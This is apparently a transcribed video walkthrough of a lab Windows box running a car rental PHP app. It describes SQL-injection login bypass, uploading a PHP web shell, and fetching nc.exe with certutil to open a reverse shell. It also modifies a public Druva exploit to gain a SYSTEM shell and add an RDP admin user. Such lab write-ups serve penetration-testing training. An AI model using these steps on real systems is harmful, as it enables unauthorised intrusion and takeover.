Hello YouTube, welcome once again. Today we are going to do this Windows based box, and this is on the Reddit forum, and it's by the IT Security Labs. The box name is Dealer313 and it's a Windows based box. So I am going to do this box today. One thing that is mentioned for this box is for privilege escalation we have not to use the sc impersonate method because that's not the intended way. Here it is written, so we are not going to use this method for our privilege escalation. So let's start. The box is already up and running in my local network, and I will start with doing the let me just check whether the box is alive or not, and it is. 10.8 is the IP of this box. So let's start with the nmap nmash-r to not randomize the ports, do it in a sequential order. V for verbose --min rate just to make things a bit faster. I'll do 2000-p- for all ports, and I will save this in a file 192.168.10.8, and immediately I see 80, 135, 139, 443, 445, 3306 and 3389 ports are opened on this box. Since SMB can be a low-hanging fruit, so we will start from SMB map 192.168 and maybe we have some kind of open shared shares. We can access those, and I don't see anything coming up. 192.168.10.8 is the IP, and there is an authentication error. Maybe try like smbclient, null authentication list 192.168.10.8, and not enough characters. Maybe I am typing it wrong. Oops, not enough characters. Oops. Not sure exactly what's wrong with my syntax. Maybe we can try hack tricks. But let's go to nmap again, and here we see a bunch of ports. So now what I will try is run nmap script again, but with sc and sv to enumerate these services, so I can get the details what exactly is running on AT. Maybe on AT, usually on AT web server is running, but sometimes there are other services running. So let's grab these ports. I am going to do grep tcp/tcp 001. So here are the ports, and I'll do cut cut d and first parameter. Right, we have all the ports, and I will now convert them into a comma in a single line. So here are all the ports. Now we can easily scan and nmap against them again, and instead of going with writing the command from scratch, let's do nmap. I'll remove sc and sv, min rate with sc and sv, and that's it, I guess. Right, so now nmap is going to run the enumeration scripts against these open ports and tell me what exactly is running on port 192.168, port 80, port 135, etc, etc. In the meantime, let's try 445 smb hack tricks to actually see what is wrong with my command, and we see hacktricks.xyz. That's one of the best resource you can do while doing the pen test or maybe doing your exams. Port at 39. Do we have like smbclient? smbclient-r. I guess I don't need to specify any. smbclient list 192.168.10.8. Right, and the access is denied. So for smbclient you don't need your forward slashes. I sometimes get confused a lot. Anyways, and the nmap is still going on, and it's complete. Right, we'll go to the top, And on port 80 we see Apache HTTPD web server running. We have some Microsoft RPC. Again on 443 we can see Windows based Apache web server running. And other than that, I see the HTTP title is car rental management system, and it's redirecting to this car rental. We have some certificate details, SMB share, MySQL is open. Interestingly, 3389 or RDP is open, so we can access with RDP. We have some right kind of credentials. I guess RDP is not open by default on Windows based system. And these are some other ports which are open by default on Windows. So I guess we'll start from the web, and I'll go to the 443 port since there is a certificate, and I like to see what kind of information we have in the certificate. Accept the risk. Oops, view certificate, sorry. Oops, HTTPS. Remove exception, and now if I go to view certificate, I can maybe see the details. Common name is localhost, so I am not getting any details of this box. I was looking for some kind of username. Maybe we can brute force or some kind of dictionary attack against that username, but not in this case. So let's switch to the HTTP port. I guess both are the same things. And I see a car rental management system. Is it a PHP based web application? It is, because I typed index.php and the same page returned. Do we have some kind of robots.txt? I don't see it. And if we go to about, it's basically loading the about page. This may be vulnerable to file inclusion attack. So if we go to, let's go to see user share checklist. What do we have to do? Fuzzing, LFI, ls, and if we do like tail, or maybe like vim, LFI, graceful, Windows to see what the payloads are. And here are some of the files present on this system, on Windows system. So if we try like for this, I see an error. What exactly is the error? Failed to open stream, no such file or directory. So failed to open boot.init. So basically it's adding a PHP file at the end. So if it's a PHP file, it's going to open. If it's not a PHP file, it's not going to open, because it's appending this .php in this thing. Anyways, what else do we have? So this means that it's basically about.php is here. No. Anyways, so since this is a car management rental management system, I will go out to ExploitDB and look out for any public exploits, if we have some kind of public exploits for this system. And where is the search box? You can also use the search exploit from the command line, but this gives a nice graphical user interface. And we see multiple vulnerabilities against it, and we have arbitrary file upload, SQL injection plus arbitrary file upload. So let's go over here and title car rental management system, SQL injection plus arbitrary file upload. Login using SQL injection 1 is equals to 1. So this is the payload, and we'll create a new car in the archive, signing a PHP file instead of, right, this is the payload. Proxy is not defined. and it will create a shell.php file, and command is going to be nc. What platform it's made for? It's tested on Debian 10, but right now we have our system is Windows, so nc plus this argument wget. We don't have wget on Windows. We have curl. Maybe we have to edit this exploit or change it. Anyways, what can we do? We can try doing the manual way of exploiting it without any scripts. If we go to the what is the path? Admin ajax.php. Do we have admin? Car rental admin. We do have, and if we try, this is the payload. I get access and I am the administrator, so SQL injection was successful. And where is that file upload thing? I am looking for file upload parameter, so we can upload some malicious file and then maybe hijack it, and here we can upload some image file. So I guess I need to use burp, right? And burp is loading, and let's just exit out of Vim, close, next, start burp. Burp is loading, and we'll do this. Right, we are inside this and we have two scans. So now I'm going to copy user share web shells php. I don't have rev shells.php with me, so let me grab it from my git repo. I have made a git repo for staying organized, and here is my git repo, and I'm going to have rce.php. Let's just wget this thing, and right, we have this rce file, and it just gets the parameter cmd from the user and executes it in the system level commands. So now we need to upload this file to this system, and if we go over here, where are we? Var temp YouTube Dealer313, and we can upload rce.php directly to this. So maybe we don't need the burp. Save it. Data successfully saved, and if I look, control U it and now do rce, I see the file being uploaded over here. So we need to duplicate, and I guess this is going to the path rce.php. rce.php, the URL was not found. Strange. Assets uploads rce.php. Maybe it's rental. If we upload some kind of file, let's just download fish, JPEG, images. Let's go for a small fish because I don't want a very big size. Fish. All these fishes are very large. Let's wait a second. 636. Save image as in pictures, and we are going to fish.jpg. And now I am going to use burp to intercept this request. So browse and pictures fish.jpg, and burp is listening. Save request, and it's going. So we'll forward it, and the picture is uploaded. We can see over here. So So if I do like fish.jpg, here is going to be the URL forward. Still saying the assets is not strange. Maybe it's in the car rental thing. Object not found. Assets upload. Why is it saying it's not found? That's strange. Copy image, view image info. Car rental admin assets. Here is the location. Car rental admin assets. Oh, I guess I am missing the admin parameter. And duplicate. I am going to turn burp off. Duplicate. I guess I was not typing the parameter right. So we have uploaded RCE. So it's going to be car rental, then admin. And if we type cmd is equals to system info, and we have a code execution. So right now our file was uploaded, but it was inside this admin folder, and I was not specifying the admin because in the URL it just states assets uploads and the admin is missing. So I was thinking it's maybe the admin is not included. Anyways, to cut short, we have a code execution over here. We can see that it's a 64 based box. So now my next thing will be going for getting a reverse shell. So you can use different methods. You can use PowerShell, but I'm going to use that netcat. So let's download netcat, netcat 64 exe download. And we are going to download the 64-bit version. Here is the netcat, and we have this netcat exe. 64 is downloaded. I will copy it to my this directory. Home John downloads nc.exe and make it nc.exe. I'll start a Python based Python 3 -m HTTP server. It's going to be on port 80. And what else do we need to do? Right, we have to catch a reverse shell. So I will just do script ref dot. Do we have our rep? I need to install it, so I have the functionality of going upwards to my command. If I don't use line rep, I won't have a functionality of going upwards to my previous commands on the reverse shell. So come on, rl I need to do script ref.log rlrep nc -lvnp 3389. This is it, and this is running. And do we have right? And now I need to what I need to do, right? I'll again go to GitHub and use my cheat sheet, which is going to be this, and curl. Come on, right? To download a file via Windows, insert util or curl. You can use curl. By default on Windows 10 onwards, curl is present, and this is the classical method of using cert util. So let's grab this line, and I need to edit with my IP, which in this case is 10.7. So 192.168.10.7 nc.exe, and just need to type over here. And 10.107, right? 10. I typed it correct. 107. Completed successfully. And we have nc.exe. What was get by 10.8. So if we do dir, we should see nc.exe present, and it is present over here. So next thing I would do is nc.exe minus invoke command prompt cmd.exe 192.168.10. What was my IP? 107. 3389 is the port I am listening on, and I am inside this reverse shell. So I can do dir, I can do who am I, and now I can use the up arrow or down arrow because I have used this line wrap and script log dot thing. Anyways, now I will go inside the cd, see users, dir, and we have Mickey mini, cd mini, dir, cd desktop, dir, and we have this user.txt. Right. So before I do that privilege escalation thing, we have this SE impersonate privilege enabled, so we can try like juicy potato, but that's not the intended way as the author has said. So let's go with some other thing, and we'll try first the low hanging fruits first, and then we will go towards using some automated scripts like WinPeas or maybe PowerUp, etc. So the thing which I will do is, what files I do have in the C folder, I see some default stuff. So let's go inside program files, and I see like common files, free switch and Google are two of the things which are not present on by default. Searchsploit, free switch, even command execution, but I don't need command execution. I need some kind of privilege escalation thing, or maybe like Google. And we have a lot. Windows, grep Windows, grep -i, privy, and I don't see any Google scripts Windows based that have privilege escalation thing associated with it. So let's move towards cd program files x86. Is this the right way, or maybe x86 dir, and I see Druva. I don't know what Druva is. What exactly is Druva? Druva, the data resiliency cloud, SaaS-based data protection and management products. Not exactly sure what it is, but let's do a searchsploit against Druva, and we have a bunch of scripts. I don't know exactly what the version of Druva is, but I see 3 privilege escalation scripts: 6.5.2, 6.6.3, and 6.6.3. So we have 3 scripts. 2 are the text files, so maybe we'll start with this script searchsploit -m to mirror this vim 4800, and this is tested on Windows 10, which is nice. CVE is on 2019, and it's a Python based script. I am not sure whether we have Python on this box or not. I don't see Python on Windows present, so this may not be the right exploit. There was another exploit, if you remember, it was with PowerShell. So let's try this searchsploit mirror 49211. Right, this is a PowerShell based exploit script, and it's running a command net user pond add, and now it's being executed over here. Kind of very small exploit. So instead of getting the adding a user, we can use netcat to get a reverse shell, or maybe we can use this exploit and do an RDP later on. So what should we do? I guess we should first catch a reverse shell. So I'll comment this thing, and $CMD is equals to, where is cd c users public dir. So c users public nc.exe and -e cmd.exe 192.168.10.107 is my IP or what? I always forget my IP. It is 107, right? And we are going to catch reverse shell on port 443. This is going to be the command, but before running this, we need to download this script, this exe over here. And if we do dir, we have nc present, and this is going to be the, right, I guess that's it. nc.exe cmd, my IP and port. And I need to start another reverse shell nc-lvnp on 443. We are over here, and I need to rename this script. Please subscribe, or please sub, not ps1, but it means please subscribe anyways. So we are going to do, maybe we can 10 please sub and please sub, and let's just execute over here. The file is downloaded. We'll run PowerShell -EP bypass, and we are going to run please sub.ps1. It's not recognized, sorry. It's going to be like this, sub.ps1, and I see something being highlighted on this pane, and I am, who am I? I am anti-authority system. That's great. And if we look at IP config, it's 10.8 cd c users dir cd administrator. I don't see administrator, that's strange. dir, we can see the desktop. Where is that flag, administrator flag? I'm not sure about that. Maybe default user 0. He's the administrator. cd desktop dir. Anyways, another thing we could have tried, like right, oops, vim please sub, and we could have tried creating another user please sub, and I have again the cheat sheet for adding a admin user on rdp. This is going to be the command, like net user add admin superadmin. So we'll this superadmin, and the second command is going to be make superadmin $cmd2 is equals to this, and this is going to be cmd1. Come on, cmd2 cmd1. So this is command cmd, maybe we can run it 2 times. cmd, so it's sending the command over here. Let me just try. See, just confused. cmd is going to be this, right, and cp please sub ps1. No, this is going to be please sub add user.ps1, and then add admin.ps1, vim add admin.ps1, and now what I am going to do is going to cmd is equals to this command. I basically wanted to just do that RDP thing. So first thing is going to be add user, and second thing is going to be add user and user.ps1. Come on. Second is going to be add admin. So I will first download this thing over here, add user, and then I'm going to download add admin, dir ic add admin and add user. I will add user.ps1, add admin.ps1. So I guess it ran, and if I try to do, where is the RDP command? Like this, I should have an RDP of this box. The IP is going to be 192.168.10.108, and it's trying to load, but the connection failed. What is the IP? It's 10.8, 192.168.10.8, not 108. And we have certificate warning. I am going to accept it. And I have RDP'd into this box. So this is another way of getting inside this box. Maybe you can add a user, and instead of getting reverse shell, you can RDP. But usually the firewall basically blocks such ports, so you may have to disable the firewall, or maybe antivirus defender. Come on, why it's taking so long? It's in my local network. Finally, I am inside this box, and here's the Druva async run as administrator. And now if we go into the C users, I don't see. I am the superadmin, which basically was created by myself. Mickey has nc or activate backup. Anyways, this is going to be desktop flag. Congrats on rooting this blocks. This is, so maybe like Mickey is the admin user. Another thing we can do is, like, if you are doing some kind of engagement, so you can, come on, let me go to the control panel, user accounts, I'm administrator, you can see over here, manage another account, and Mickey is also the administrator. So let's change the password of Mickey to be mouse123 mouse, mouse123 mouse, come on, 1 2 3. So if we try logging with mouse123 Mickey, and it's logging, so I guess the password change worked, and it did. And here we can see the flag, and we can also go inside the Chrome, recycle bin, right? The recycle bin also has some kind of PrivEsc script. So let's see what is inside this script, and I want to use the notepad. I don't want so I guess the author also ran this script just to test it, because if you go inside the control panel, you can see a user created by the name pond. Manage their account. So this is a local account that was created, and we ran two commands that made our user superadmin the administrator. Anyways, so the author basically also used this exploit which we used. So our methodology was same, and I guess that's it from this box right now. If you like this video, please like my video and subscribe to this channel for more upcoming videos, and also subscribe to the IT Security Lab. He's doing some amazing content with the Windows boxes. Till then, till I meet you next time, have a good day. Bye bye.